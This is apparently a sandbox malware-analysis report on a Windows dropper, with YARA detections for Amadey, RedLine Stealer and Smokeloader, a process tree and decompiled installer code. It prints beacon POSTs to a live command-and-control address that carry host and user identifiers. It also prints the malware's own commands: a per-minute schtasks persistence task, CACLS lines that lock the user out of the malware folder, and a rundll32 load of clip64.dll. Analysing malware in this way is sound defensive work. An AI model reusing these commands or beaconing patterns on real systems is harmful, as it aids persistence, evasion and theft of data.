97	192.168.2.5	49804	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:32.699146986 CET	295	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:32.763117075 CET	295	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.5	49805	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:32.928580999 CET	296	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:32.990704060 CET	296	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.5	49806	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:33.169487953 CET	297	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:33.236960888 CET	297	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 4604, Parent PID: 3324

General

Target ID:	0
Start time:	19:56:30
Start date:	07/02/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x70000
File size:	537600 bytes
MD5 hash:	B16D53F153404F5825765F11AB2B6827
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.299202495.0000000004AE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bKug.exePID: 2188, Parent PID: 4604

General

Target ID:	1
Start time:	19:56:30
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
Imagebase:	0x1080000
File size:	346112 bytes
MD5 hash:	E2A785D0666AFD7BBE63FAF32216A8AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: aKuf.exePID: 4916, Parent PID: 2188

General

Target ID:	2
Start time:	19:56:31
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe
Imagebase:	0x400000
File size:	251392 bytes
MD5 hash:	CCFC1E2539F9382400217DF5AE6D1D8A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.338085123.0000000000676000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.311645008.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 49%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4724, Parent PID: 3324

General

Target ID:	3
Start time:	19:56:43
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff79b0e0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nika.exePID: 5316, Parent PID: 2188

General

Target ID:	4
Start time:	19:56:49
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
Imagebase:	0x4e0000
File size:	11264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5352, Parent PID: 3324

General

Target ID:	5
Start time:	19:56:51
Start date:	07/02/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff79b0e0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: xriv.exePID: 3096, Parent PID: 4604

General

Target ID:	6
Start time:	19:57:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
Imagebase:	0x8c0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000000.363553384.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.365333016.00000000008C1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 2328, Parent PID: 3096

General

Target ID:	7
Start time:	19:57:01
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000000.365076498.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.822951926.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000007.00000002.823055961.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4484, Parent PID: 2328

General

Target ID:	8
Start time:	19:57:01
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Imagebase:	0xfd0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5076, Parent PID: 2328

General

Target ID:	9
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4968, Parent PID: 4484

General

Target ID:	10
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2332, Parent PID: 5076

General

Target ID:	11
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4512, Parent PID: 5076

General

Target ID:	12
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 5860, Parent PID: 5076

General

Target ID:	13
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "mnolyk.exe" /P "user:N"
Imagebase:	0x11f0000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 5856, Parent PID: 5076

General

Target ID:	14
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "mnolyk.exe" /P "user:R" /E
Imagebase:	0x11f0000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3484, Parent PID: 5076

General

Target ID:	15
Start time:	19:57:02
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 3236, Parent PID: 5076

General

Target ID:	16
Start time:	19:57:03
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\4b9a106e76" /P "user:N"
Imagebase:	0x11f0000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 3580, Parent PID: 5076

General

Target ID:	17
Start time:	19:57:03
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\4b9a106e76" /P "user:R" /E
Imagebase:	0x11f0000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 4760, Parent PID: 1084

General

Target ID:	18
Start time:	19:57:03
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.375060444.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000000.369836464.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4716, Parent PID: 2328

General

Target ID:	19
Start time:	19:57:04
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Imagebase:	0x1040000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 4500, Parent PID: 1084

General

Target ID:	25
Start time:	19:58:01
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.494123229.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000000.493543411.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 3808, Parent PID: 1084

General

Target ID:	27
Start time:	19:59:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.620289864.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000000.619946114.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: mnolyk.exePID: 1104, Parent PID: 1084

General

Target ID:	29
Start time:	20:00:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0xad0000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000002.755532601.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000000.748563706.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 4604, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	26.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27%
Total number of Nodes:	967
Total number of Limit Nodes:	41

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00073BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00073BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x78004; // 0xdaa0d862
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x79124 =  *0x79124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x78a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x78c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0007468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x79124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00071AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00076CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00073FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x78580;
													if( *0x78580 != 0) {
														E00072267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x78180;
											if( *0x78180 == 0) {
												_t146 = 0x4c7;
												E000744B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x79124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x79a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00076495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E000744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x79124 = E00076285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E000744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x78a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x79a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x78a38 & 0x0000ffff;
											_v380 = 0x79154;
											_v376 = _t151;
											_v372 = 0x791e4;
											_v360 = _t97;
											if( *0x78a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x79a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x78d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x79a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x7a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x79124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x79a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x78a20;
										if( *0x78a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0007202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0007468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x78c42;
									if( *0x78c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x78a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0007468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0007468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
